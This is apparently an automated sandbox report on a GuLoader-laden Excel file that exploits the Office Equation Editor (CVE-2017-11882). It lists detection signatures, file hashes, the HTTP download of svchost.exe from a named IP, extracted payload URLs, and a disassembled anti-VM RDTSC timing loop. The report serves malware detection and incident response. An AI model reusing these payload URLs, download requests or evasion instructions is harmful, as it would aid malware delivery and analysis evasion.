Analysis Report BL_SGN11203184.xlsx

Overview

General Information

Sample Name: BL_SGN11203184.xlsx
Analysis ID: 432590
MD5: 06eb9a2b3d7113604968b87722ed242a
SHA1: 2a6929b76b8b69a4e3a3766881280c63af765cb1
SHA256: 1554d0f1b36381c9a323749cd62b7870c8273d8020fc81df09cb159a3bb84acc
Tags: VelvetSweatshopxlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://103.155.82.236/fksdoc/svchost.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://www.pos.nblwarehouse.my.id/bin_GgrWeMMq137.bin, http://benvenuti.rs/wp-co"}
Multi AV Scanner detection for domain / URL
Source: http://103.155.82.236/fksdoc/svchost.exe Virustotal: Detection: 12%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe Metadefender: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe ReversingLabs: Detection: 58%
Source: C:\Users\Public\vbc.exe Metadefender: Detection: 28%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 58%
Multi AV Scanner detection for submitted file
Source: BL_SGN11203184.xlsx ReversingLabs: Detection: 21%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 4MB later: 46MB
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 103.155.82.236:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 103.155.82.236:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 103.155.82.236:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://www.pos.nblwarehouse.my.id/bin_GgrWeMMq137.bin, http://benvenuti.rs/wp-co
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Jun 2021 13:17:37 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Wed, 09 Jun 2021 07:07:06 GMTETag: "24000-5c44fec1ebc1c"Accept-Ranges: bytesContent-Length: 147456Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /fksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.82.236Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F77229A3.emf
Source: global traffic HTTP traffic detected: GET /fksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.82.236Connection: Keep-Alive
Source: F77229A3.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 4_2_00446A2E NtAllocateVirtualMemory, 4_2_00446A2E
Source: C:\Users\Public\vbc.exe Code function: 4_2_00446A78 NtAllocateVirtualMemory, 4_2_00446A78
Source: C:\Users\Public\vbc.exe Code function: 4_2_00446C20 NtAllocateVirtualMemory, 4_2_00446C20
Source: C:\Users\Public\vbc.exe Code function: 4_2_00446AF8 NtAllocateVirtualMemory, 4_2_00446AF8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00446B94 NtAllocateVirtualMemory, 4_2_00446B94
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_00401C10 4_2_00401C10
Source: C:\Users\Public\vbc.exe Code function: 4_2_004055F3 4_2_004055F3
Source: C:\Users\Public\vbc.exe Code function: 4_2_00446A2E 4_2_00446A2E
Source: C:\Users\Public\vbc.exe Code function: 4_2_00444440 4_2_00444440
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044185A 4_2_0044185A
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044666C 4_2_0044666C
Source: C:\Users\Public\vbc.exe Code function: 4_2_00446A78 4_2_00446A78
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044B409 4_2_0044B409
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044341C 4_2_0044341C
Source: C:\Users\Public\vbc.exe Code function: 4_2_00446629 4_2_00446629
Source: C:\Users\Public\vbc.exe Code function: 4_2_00443834 4_2_00443834
Source: C:\Users\Public\vbc.exe Code function: 4_2_00443A30 4_2_00443A30
Source: C:\Users\Public\vbc.exe Code function: 4_2_00443238 4_2_00443238
Source: C:\Users\Public\vbc.exe Code function: 4_2_004434C0 4_2_004434C0
Source: C:\Users\Public\vbc.exe Code function: 4_2_004436DE 4_2_004436DE
Source: C:\Users\Public\vbc.exe Code function: 4_2_00446AF8 4_2_00446AF8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00444490 4_2_00444490
Source: C:\Users\Public\vbc.exe Code function: 4_2_004432A0 4_2_004432A0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00443AA0 4_2_00443AA0
Source: C:\Users\Public\vbc.exe Code function: 4_2_004466B8 4_2_004466B8
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044350C 4_2_0044350C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044450C 4_2_0044450C
Source: C:\Users\Public\vbc.exe Code function: 4_2_00443714 4_2_00443714
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044331C 4_2_0044331C
Source: C:\Users\Public\vbc.exe Code function: 4_2_00443925 4_2_00443925
Source: C:\Users\Public\vbc.exe Code function: 4_2_00443B30 4_2_00443B30
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044173C 4_2_0044173C
Source: C:\Users\Public\vbc.exe Code function: 4_2_004439DC 4_2_004439DC
Source: C:\Users\Public\vbc.exe Code function: 4_2_004431D8 4_2_004431D8
Source: C:\Users\Public\vbc.exe Code function: 4_2_004447ED 4_2_004447ED
Source: C:\Users\Public\vbc.exe Code function: 4_2_004443FB 4_2_004443FB
Source: C:\Users\Public\vbc.exe Code function: 4_2_00443788 4_2_00443788
Source: C:\Users\Public\vbc.exe Code function: 4_2_00444993 4_2_00444993
Source: C:\Users\Public\vbc.exe Code function: 4_2_004433A4 4_2_004433A4
Source: C:\Users\Public\vbc.exe Code function: 4_2_004417B8 4_2_004417B8
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: BL_SGN11203184.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
PE file contains strange resources
Source: svchost[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@4/16@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$BL_SGN11203184.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRF085.tmp
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: BL_SGN11203184.xlsx ReversingLabs: Detection: 21%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: BL_SGN11203184.xlsx Static file information: File size 1317888 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: BL_SGN11203184.xlsx Initial sample: OLE indicators vbamacros = False
Source: BL_SGN11203184.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, type: MEMORY
Yara detected GuLoader
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000004.00000000.2151758048.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\Public\vbc.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe, type: DROPPED
Source: Yara match File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00409C54 push es; iretd 4_2_00409C5E
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040605F push 00000059h; retf 4_2_00406061
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406E64 push eax; retf 4_2_00406E65
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040A065 pushad ; retf 4_2_0040A0B8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00409E0D push edx; iretd 4_2_00409E12
Source: C:\Users\Public\vbc.exe Code function: 4_2_00409EF8 push ss; iretd 4_2_00409EFE
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406AFE push es; iretd 4_2_00406B02
Source: C:\Users\Public\vbc.exe Code function: 4_2_004079CA push cs; iretd 4_2_004079CE
Source: C:\Users\Public\vbc.exe Code function: 4_2_00409387 push ss; iretd 4_2_004093A6
Source: C:\Users\Public\vbc.exe Code function: 4_2_00408D90 push cs; iretd 4_2_00408D9E
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403191 push dword ptr [ebp-44h]; ret 4_2_0041ECA4
Source: C:\Users\Public\vbc.exe Code function: 4_2_00445356 push edi; iretd 4_2_00445357

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: BL_SGN11203184.xlsx Stream path 'EncryptedPackage' entropy: 7.99983573817 (max. 8.0)

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000449F94 second address: 000000000044A040 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub esp, 00000100h 0x00000010 mov edi, esp 0x00000012 test cx, dx 0x00000015 add esp, 00000100h 0x0000001b test eax, eax 0x0000001d mov dword ptr [edi+28h], eax 0x00000020 test bx, dx 0x00000023 mov esi, BEC25DA1h 0x00000028 add esi, 4F1D403Dh 0x0000002e xor esi, E8F819C0h 0x00000034 add esi, 1AD96BE2h 0x0000003a jmp 00007F0994A9E00Eh 0x0000003c pushad 0x0000003d mov eax, 0000003Fh 0x00000042 cpuid 0x00000044 popad 0x00000045 add esi, 00001000h 0x0000004b cmp esi, 0000F000h 0x00000051 je 00007F0994A9E520h 0x00000057 cmp esi, 7FFFF000h 0x0000005d je 00007F0994A9E514h 0x00000063 push 0AF1A7F6h 0x00000068 xor dword ptr [esp], 7FA34B79h 0x0000006f pushad 0x00000070 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000044A040 second address: 000000000044A040 instructions:
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000449F94 second address: 000000000044A040 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub esp, 00000100h 0x00000010 mov edi, esp 0x00000012 test cx, dx 0x00000015 add esp, 00000100h 0x0000001b test eax, eax 0x0000001d mov dword ptr [edi+28h], eax 0x00000020 test bx, dx 0x00000023 mov esi, BEC25DA1h 0x00000028 add esi, 4F1D403Dh 0x0000002e xor esi, E8F819C0h 0x00000034 add esi, 1AD96BE2h 0x0000003a jmp 00007F0994A9E00Eh 0x0000003c pushad 0x0000003d mov eax, 0000003Fh 0x00000042 cpuid 0x00000044 popad 0x00000045 add esi, 00001000h 0x0000004b cmp esi, 0000F000h 0x00000051 je 00007F0994A9E520h 0x00000057 cmp esi, 7FFFF000h 0x0000005d je 00007F0994A9E514h 0x00000063 push 0AF1A7F6h 0x00000068 xor dword ptr [esp], 7FA34B79h 0x0000006f pushad 0x00000070 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000044A040 second address: 000000000044A040 instructions:
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 4_2_00446454 rdtsc 4_2_00446454
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2336 Thread sleep time: -300000s >= -30000s

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 4_2_00446454 rdtsc 4_2_00446454
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 4_2_00444440 mov eax, dword ptr fs:[00000030h] 4_2_00444440
Source: C:\Users\Public\vbc.exe Code function: 4_2_004436DE mov eax, dword ptr fs:[00000030h] 4_2_004436DE
Source: C:\Users\Public\vbc.exe Code function: 4_2_004490F5 mov eax, dword ptr fs:[00000030h] 4_2_004490F5
Source: C:\Users\Public\vbc.exe Code function: 4_2_004464F9 mov eax, dword ptr fs:[00000030h] 4_2_004464F9
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044993D mov eax, dword ptr fs:[00000030h] 4_2_0044993D
Source: C:\Users\Public\vbc.exe Code function: 4_2_004443FB mov eax, dword ptr fs:[00000030h] 4_2_004443FB

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: vbc.exe, 00000004.00000002.2364939955.0000000000980000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000004.00000002.2364939955.0000000000980000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000004.00000002.2364939955.0000000000980000.00000002.00000001.sdmp Binary or memory string: !Progman